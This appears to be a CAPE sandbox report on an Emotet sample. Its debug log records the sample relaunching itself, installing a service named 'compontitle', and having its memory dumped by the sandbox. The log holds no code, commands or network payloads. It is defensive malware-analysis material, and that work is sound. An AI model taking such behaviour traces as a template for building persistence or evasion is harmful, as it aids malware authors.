CAPE

Detections: Emotet
Triggered CAPE Tasks: Task #115358: Extraction


Analysis

Category: FILE
Package: exe
Started: 2019-12-03 05:50:30
Completed: 2019-12-03 05:55:13
Duration: 283 seconds

Options:
route = internet
procdump = 1

Log:
2019-12-03 05:50:41,000 [root] INFO: Date set to: 12-03-19, time set to: 05:50:41, timeout set to: 200
2019-12-03 05:50:41,155 [root] DEBUG: Starting analyzer from: C:\ilkkxkodz
2019-12-03 05:50:41,155 [root] DEBUG: Storing results at: C:\HBzTSUSYC
2019-12-03 05:50:41,155 [root] DEBUG: Pipe server name: \\.\PIPE\QmTuKfWf
2019-12-03 05:50:41,155 [root] INFO: Analysis package "exe" has been specified.
2019-12-03 05:50:51,374 [root] DEBUG: Started auxiliary module Browser
2019-12-03 05:50:51,374 [root] DEBUG: Started auxiliary module Curtain
2019-12-03 05:50:51,388 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-12-03 05:50:55,444 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-12-03 05:50:55,444 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-12-03 05:50:55,460 [root] DEBUG: Started auxiliary module DigiSig
2019-12-03 05:50:55,460 [root] DEBUG: Started auxiliary module Disguise
2019-12-03 05:50:55,460 [root] DEBUG: Started auxiliary module Human
2019-12-03 05:50:55,476 [root] DEBUG: Started auxiliary module Screenshots
2019-12-03 05:50:55,476 [root] DEBUG: Started auxiliary module Sysmon
2019-12-03 05:50:55,476 [root] DEBUG: Started auxiliary module Usage
2019-12-03 05:50:55,476 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-12-03 05:50:55,476 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-12-03 05:50:55,507 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\nonmanual.exe" with arguments "" with pid 1952
2019-12-03 05:50:55,507 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:50:55,507 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:50:55,539 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:50:55,539 [root] DEBUG: Loader: Injecting process 1952 (thread 1752) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:50:55,539 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:50:55,539 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:50:55,539 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1952
2019-12-03 05:50:57,878 [lib.api.process] INFO: Successfully resumed process with pid 1952
2019-12-03 05:50:58,690 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:50:58,706 [root] INFO: Added new process to list with pid: 1952
2019-12-03 05:50:58,752 [root] DEBUG: Process dumps enabled.
2019-12-03 05:50:59,017 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1952 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:50:59,049 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\nonmanual.exe".
2019-12-03 05:50:59,049 [root] INFO: Monitor successfully loaded in process with pid 1952.
2019-12-03 05:50:59,673 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-12-03 05:50:59,687 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:50:59,687 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-12-03 05:50:59,687 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\profapi (0xb000 bytes).
2019-12-03 05:50:59,703 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-12-03 05:50:59,720 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-12-03 05:51:00,155 [root] DEBUG: set_caller_info: Adding region at 0x00350000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:00,171 [root] DEBUG: set_caller_info: Adding region at 0x004F0000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:00,296 [root] INFO: Announced 32-bit process name: nonmanual.exe pid: 1272
2019-12-03 05:51:00,312 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:00,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:00,328 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:00,328 [root] DEBUG: Loader: Injecting process 1272 (thread 1924) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,328 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:00,328 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,344 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:51:00,344 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:51:00,344 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:51:00,344 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,358 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1272
2019-12-03 05:51:00,358 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-12-03 05:51:00,390 [root] DEBUG: DLL unloaded from 0x00400000.
2019-12-03 05:51:00,405 [root] INFO: Announced 32-bit process name: nonmanual.exe pid: 1272
2019-12-03 05:51:00,405 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:00,405 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:00,421 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:00,421 [root] DEBUG: Loader: Injecting process 1272 (thread 1924) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,421 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:00,421 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,421 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-12-03 05:51:00,421 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,437 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1272
2019-12-03 05:51:00,437 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1952
2019-12-03 05:51:00,437 [root] DEBUG: GetHookCallerBase: thread 1752 (handle 0x0), return address 0x004FCA51, allocation base 0x004F0000.
2019-12-03 05:51:00,437 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:51:00,437 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:00,437 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:51:00,453 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:51:00,453 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:00,453 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:00,467 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:00,483 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1952_19891943380111432122019
2019-12-03 05:51:00,483 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:51:00,483 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x004F0000.
2019-12-03 05:51:00,483 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x004F0000
2019-12-03 05:51:00,483 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:00,500 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:51:00,500 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1272 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:51:00,500 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x004F0000.
2019-12-03 05:51:00,500 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\--f4134209.
2019-12-03 05:51:00,500 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C983.
2019-12-03 05:51:00,500 [root] INFO: Added new process to list with pid: 1272
2019-12-03 05:51:00,515 [root] INFO: Monitor successfully loaded in process with pid 1272.
2019-12-03 05:51:00,530 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1952_5990066460111432122019
2019-12-03 05:51:00,530 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10000.
2019-12-03 05:51:00,546 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-12-03 05:51:00,546 [root] INFO: Notified of termination of process with pid 1952.
2019-12-03 05:51:00,779 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-12-03 05:51:00,826 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:51:00,904 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-12-03 05:51:00,921 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\system32\profapi (0xb000 bytes).
2019-12-03 05:51:00,936 [root] DEBUG: set_caller_info: Adding region at 0x00510000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:00,967 [root] DEBUG: set_caller_info: Adding region at 0x00520000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:08,283 [root] DEBUG: DLL loaded at 0x75FF0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-12-03 05:51:08,315 [root] DEBUG: DLL loaded at 0x74970000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-12-03 05:51:08,331 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-12-03 05:51:08,345 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-12-03 05:51:08,440 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-12-03 05:51:08,470 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-12-03 05:51:08,486 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-12-03 05:51:08,486 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-12-03 05:51:08,486 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-12-03 05:51:08,517 [root] DEBUG: DLL unloaded from 0x76430000.
2019-12-03 05:51:08,782 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1676
2019-12-03 05:51:08,813 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:08,813 [lib.api.process] INFO: 64-bit DLL to inject is C:\ilkkxkodz\dll\opQXCqc.dll, loader C:\ilkkxkodz\bin\rntRXAvE.exe
2019-12-03 05:51:08,829 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:08,845 [root] DEBUG: Loader: Injecting process 1676 (thread 0) with C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:08,845 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1680, handle 0x84
2019-12-03 05:51:08,861 [root] DEBUG: Process image base: 0x00000000FF270000
2019-12-03 05:51:08,861 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-12-03 05:51:08,891 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-12-03 05:51:08,907 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:08,907 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:08,938 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:09,125 [root] WARNING: Unable to place hook on LockResource
2019-12-03 05:51:09,125 [root] WARNING: Unable to hook LockResource
2019-12-03 05:51:09,328 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1676 at 0x0000000074790000, image base 0x00000000FF270000, stack from 0x0000000006BA2000-0x0000000006BB0000
2019-12-03 05:51:09,328 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-12-03 05:51:09,345 [root] INFO: Added new process to list with pid: 1676
2019-12-03 05:51:09,345 [root] INFO: Monitor successfully loaded in process with pid 1676.
2019-12-03 05:51:09,484 [root] DEBUG: set_caller_info: Adding region at 0x0000000074CD0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:09,484 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-12-03 05:51:09,500 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-12-03 05:51:09,500 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:09,703 [root] DEBUG: DLL unloaded from 0x74870000.
2019-12-03 05:51:09,719 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-12-03 05:51:09,796 [root] DEBUG: DLL loaded at 0x74780000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-12-03 05:51:09,844 [root] DEBUG: DLL unloaded from 0x74780000.
2019-12-03 05:51:09,844 [root] DEBUG: DLL unloaded from 0x75F00000.
2019-12-03 05:51:09,859 [root] DEBUG: DLL unloaded from 0x76430000.
2019-12-03 05:51:10,171 [root] INFO: Announced starting service "compontitle"
2019-12-03 05:51:10,171 [root] INFO: Attaching to Service Control Manager (services.exe - pid 464)
2019-12-03 05:51:10,187 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:10,187 [lib.api.process] INFO: 64-bit DLL to inject is C:\ilkkxkodz\dll\opQXCqc.dll, loader C:\ilkkxkodz\bin\rntRXAvE.exe
2019-12-03 05:51:10,233 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:10,233 [root] DEBUG: Loader: Injecting process 464 (thread 0) with C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:10,233 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-12-03 05:51:10,250 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:10,250 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:10,265 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:10,280 [root] WARNING: Unable to place hook on LockResource
2019-12-03 05:51:10,280 [root] WARNING: Unable to hook LockResource
2019-12-03 05:51:10,312 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 464 at 0x0000000074790000, image base 0x00000000FFAB0000, stack from 0x0000000002896000-0x00000000028A0000
2019-12-03 05:51:10,312 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-12-03 05:51:10,312 [root] INFO: Added new process to list with pid: 464
2019-12-03 05:51:10,328 [root] INFO: Monitor successfully loaded in process with pid 464.
2019-12-03 05:51:10,358 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-12-03 05:51:10,358 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-12-03 05:51:10,374 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:11,966 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 112
2019-12-03 05:51:11,966 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:11,966 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:13,852 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:13,868 [root] DEBUG: Loader: Injecting process 112 (thread 2012) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:14,055 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:14,055 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:18,283 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:51:18,299 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:51:25,990 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:51:25,990 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:25,990 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 112
2019-12-03 05:51:32,183 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 112
2019-12-03 05:51:32,183 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:32,183 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:33,088 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:34,023 [root] DEBUG: Loader: Injecting process 112 (thread 2012) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:34,023 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:38,220 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF89A0000 to caller regions list (ntdll::NtDuplicateObject).
2019-12-03 05:51:38,266 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:38,266 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-12-03 05:51:38,313 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:38,313 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4520000 to caller regions list (ntdll::NtDuplicateObject).
2019-12-03 05:51:38,313 [root] DEBUG: DLL unloaded from 0x758D0000.
2019-12-03 05:51:38,313 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 112
2019-12-03 05:51:38,313 [root] DEBUG: DLL unloaded from 0x000007FEF36B0000.
2019-12-03 05:51:41,013 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF36B0000 to caller regions list (ntdll::NtClose).
2019-12-03 05:51:41,013 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:41,013 [root] DEBUG: DLL unloaded from 0x000007FEF5410000.
2019-12-03 05:51:41,028 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:41,028 [root] DEBUG: DLL unloaded from 0x000007FEF79E0000.
2019-12-03 05:51:41,043 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF79E0000 to caller regions list (ntdll::NtClose).
2019-12-03 05:51:41,043 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:41,075 [root] DEBUG: DLL unloaded from 0x000007FEFBF80000.
2019-12-03 05:51:41,075 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:51:41,075 [root] DEBUG: DLL unloaded from 0x000007FEF9DF0000.
2019-12-03 05:51:41,091 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 112 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:51:41,091 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\compontitle.exe".
2019-12-03 05:51:41,105 [root] INFO: Added new process to list with pid: 112
2019-12-03 05:51:41,105 [root] INFO: Monitor successfully loaded in process with pid 112.
2019-12-03 05:51:41,105 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9DF0000 to caller regions list (ntdll::NtFreeVirtualMemory).
2019-12-03 05:51:41,184 [root] DEBUG: DLL unloaded from 0x000007FEFA0D0000.
2019-12-03 05:51:41,216 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA0D0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-12-03 05:51:41,216 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-12-03 05:51:41,246 [root] DEBUG: DLL unloaded from 0x000007FEFA6F0000.
2019-12-03 05:51:41,246 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:51:41,246 [root] DEBUG: DLL unloaded from 0x000007FEF9F00000.
2019-12-03 05:51:41,246 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-12-03 05:51:41,262 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9F00000 to caller regions list (ntdll::NtClose).
2019-12-03 05:51:41,262 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA360000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-12-03 05:51:41,278 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-12-03 05:51:41,278 [root] DEBUG: DLL unloaded from 0x000007FEF6370000.
2019-12-03 05:51:41,278 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-12-03 05:51:41,293 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6370000 to caller regions list (ntdll::NtFreeVirtualMemory).
2019-12-03 05:51:41,339 [root] DEBUG: DLL unloaded from 0x000007FEF3840000.
2019-12-03 05:51:41,512 [root] DEBUG: set_caller_info: Adding region at 0x00A90000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:41,528 [root] DEBUG: set_caller_info: Adding region at 0x00AF0000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:41,542 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 912
2019-12-03 05:51:41,559 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:41,559 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:41,605 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:41,605 [root] DEBUG: Loader: Injecting process 912 (thread 1020) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,605 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:41,605 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,621 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:51:41,621 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:51:41,637 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:51:41,637 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,637 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 912
2019-12-03 05:51:41,637 [root] DEBUG: DLL unloaded from 0x00400000.
2019-12-03 05:51:41,637 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-12-03 05:51:41,651 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 912
2019-12-03 05:51:41,651 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:41,651 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:41,667 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:41,667 [root] DEBUG: Loader: Injecting process 912 (thread 1020) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,667 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:41,667 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,667 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-12-03 05:51:41,684 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,684 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 912
2019-12-03 05:51:41,684 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 112
2019-12-03 05:51:41,714 [root] DEBUG: GetHookCallerBase: thread 2012 (handle 0x0), return address 0x00AFCA51, allocation base 0x00AF0000.
2019-12-03 05:51:41,714 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:41,714 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:51:41,714 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:41,730 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:41,730 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:51:41,746 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:41,746 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:51:41,746 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:51:41,762 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\112_4406920052111432122019
2019-12-03 05:51:41,762 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 912 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:51:41,762 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:51:41,776 [root] DEBUG: Commandline: C:\Windows\System32\--ce2bae20.
2019-12-03 05:51:41,776 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00AF0000.
2019-12-03 05:51:41,792 [root] INFO: Added new process to list with pid: 912
2019-12-03 05:51:41,792 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00AF0000
2019-12-03 05:51:41,792 [root] INFO: Monitor successfully loaded in process with pid 912.
2019-12-03 05:51:41,792 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:41,871 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00AF0000.
2019-12-03 05:51:41,901 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C983.
2019-12-03 05:51:41,917 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-12-03 05:51:41,933 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:51:41,933 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\112_3652987252111432122019
2019-12-03 05:51:41,933 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10000.
2019-12-03 05:51:41,933 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-12-03 05:51:41,948 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-12-03 05:51:41,948 [root] INFO: Notified of termination of process with pid 112.
